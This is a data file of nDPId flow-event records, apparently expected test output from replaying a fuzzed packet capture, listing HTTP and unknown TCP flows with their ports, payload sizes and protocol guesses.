00661{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854546078,"flow_last_seen":1031854546078,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2639,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854546078,"flow_last_seen":1031854546078,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2639,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00661{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854525904,"flow_last_seen":1031854525904,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"68.37.115.0","src_port":2603,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854525904,"flow_last_seen":1031854525904,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"68.37.115.0","src_port":2603,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00660{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854495447,"flow_last_seen":1031854495447,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.21.3.13","src_port":2602,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854495447,"flow_last_seen":1031854495447,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.21.3.13","src_port":2602,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00669{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854489031,"flow_last_seen":1031854489031,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.57.3.13","src_port":80,"dst_port":53132,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
00595{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854489031,"flow_last_seen":1031854489031,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.57.3.13","src_port":80,"dst_port":53132,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00599{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562321,"flow_last_seen":1031854562321,"flow_idle_time":7440000,"flow_min_l4_payload_len":1460,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1460,"flow_avg_l4_payload_len":1460,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":9587,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00663{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854535022,"flow_last_seen":1031854535022,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.76.5","src_port":80,"dst_port":65069,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854535022,"flow_last_seen":1031854535022,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.76.5","src_port":80,"dst_port":65069,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00661{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854546079,"flow_last_seen":1031854546079,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.52.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2093,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854546079,"flow_last_seen":1031854546079,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.52.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2093,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00615{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854543322,"flow_last_seen":1031854543322,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"170.170.170.170","dst_ip":"170.170.170.170","src_port":43690,"dst_port":43690,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
00600{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854543322,"flow_last_seen":1031854543322,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"170.170.170.170","dst_ip":"170.170.170.170","src_port":43690,"dst_port":43690,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00658{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854488668,"flow_last_seen":1031854488668,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"0.20.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2601,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854488668,"flow_last_seen":1031854488668,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"0.20.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2601,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00668{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854489131,"flow_last_seen":1031854489131,"flow_idle_time":7560000,"flow_min_l4_payload_len":427,"flow_max_l4_payload_len":427,"flow_tot_l4_payload_len":427,"flow_avg_l4_payload_len":427,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.6.3.5","dst_ip":"172.20.3.13","src_port":80,"dst_port":53132,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
00594{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854489131,"flow_last_seen":1031854489131,"flow_idle_time":7560000,"flow_min_l4_payload_len":427,"flow_max_l4_payload_len":427,"flow_tot_l4_payload_len":427,"flow_avg_l4_payload_len":427,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.6.3.5","dst_ip":"172.20.3.13","src_port":80,"dst_port":53132,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00679{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562489,"flow_last_seen":1031854562489,"flow_idle_time":7560000,"flow_min_l4_payload_len":800,"flow_max_l4_payload_len":800,"flow_tot_l4_payload_len":800,"flow_avg_l4_payload_len":800,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.70.3.5","src_port":53136,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"HTTP.Cloudflare","breed":"Acceptable","category":"Web"},"http": {}}
00596{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562489,"flow_last_seen":1031854562489,"flow_idle_time":7560000,"flow_min_l4_payload_len":800,"flow_max_l4_payload_len":800,"flow_tot_l4_payload_len":800,"flow_avg_l4_payload_len":800,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.70.3.5","src_port":53136,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00668{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854535090,"flow_last_seen":1031854535090,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"44.20.3.5","src_port":80,"dst_port":2605,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
00594{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854535090,"flow_last_seen":1031854535090,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"44.20.3.5","src_port":80,"dst_port":2605,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00678{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854535021,"flow_last_seen":1031854535021,"flow_idle_time":7560000,"flow_min_l4_payload_len":423,"flow_max_l4_payload_len":423,"flow_tot_l4_payload_len":423,"flow_avg_l4_payload_len":423,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"51.20.3.5","dst_ip":"172.20.3.13","src_port":2605,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": {}}
00594{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854535021,"flow_last_seen":1031854535021,"flow_idle_time":7560000,"flow_min_l4_payload_len":423,"flow_max_l4_payload_len":423,"flow_tot_l4_payload_len":423,"flow_avg_l4_payload_len":423,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"51.20.3.5","dst_ip":"172.20.3.13","src_port":2605,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00660{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854525903,"flow_last_seen":1031854525903,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"72.20.3.13","src_port":2603,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854525903,"flow_last_seen":1031854525903,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"72.20.3.13","src_port":2603,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00660{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1031854484481,"flow_last_seen":1031854484482,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2600,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1031854484481,"flow_last_seen":1031854484482,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2600,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00662{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854499919,"flow_last_seen":1031854499919,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.88","dst_ip":"172.20.3.82","src_port":80,"dst_port":2601,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
00588{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854499919,"flow_last_seen":1031854499919,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.88","dst_ip":"172.20.3.82","src_port":80,"dst_port":2601,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1031854488666,"flow_last_seen":1031854499919,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":5827,"flow_avg_l4_payload_len":529,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2601,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00812{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1031854495447,"flow_last_seen":1031854506544,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":708,"flow_tot_l4_payload_len":1195,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2602,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
00601{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854488668,"flow_last_seen":1031854488668,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":81,"dst_port":2601,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854488668,"flow_last_seen":1031854488668,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":81,"dst_port":2601,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00662{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854525903,"flow_last_seen":1031854525903,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.82.5","src_port":80,"dst_port":2603,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
00588{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854525903,"flow_last_seen":1031854525903,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.82.5","src_port":80,"dst_port":2603,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00661{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854514843,"flow_last_seen":1031854514843,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.77","src_port":2603,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854514843,"flow_last_seen":1031854514843,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.77","src_port":2603,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00666{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1031854514843,"flow_last_seen":1031854525904,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":23,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2603,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
00591{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1031854514843,"flow_last_seen":1031854525904,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":23,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2603,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00662{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854532143,"flow_last_seen":1031854532143,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.68.5","src_port":80,"dst_port":2604,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854532143,"flow_last_seen":1031854532143,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.68.5","src_port":80,"dst_port":2604,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
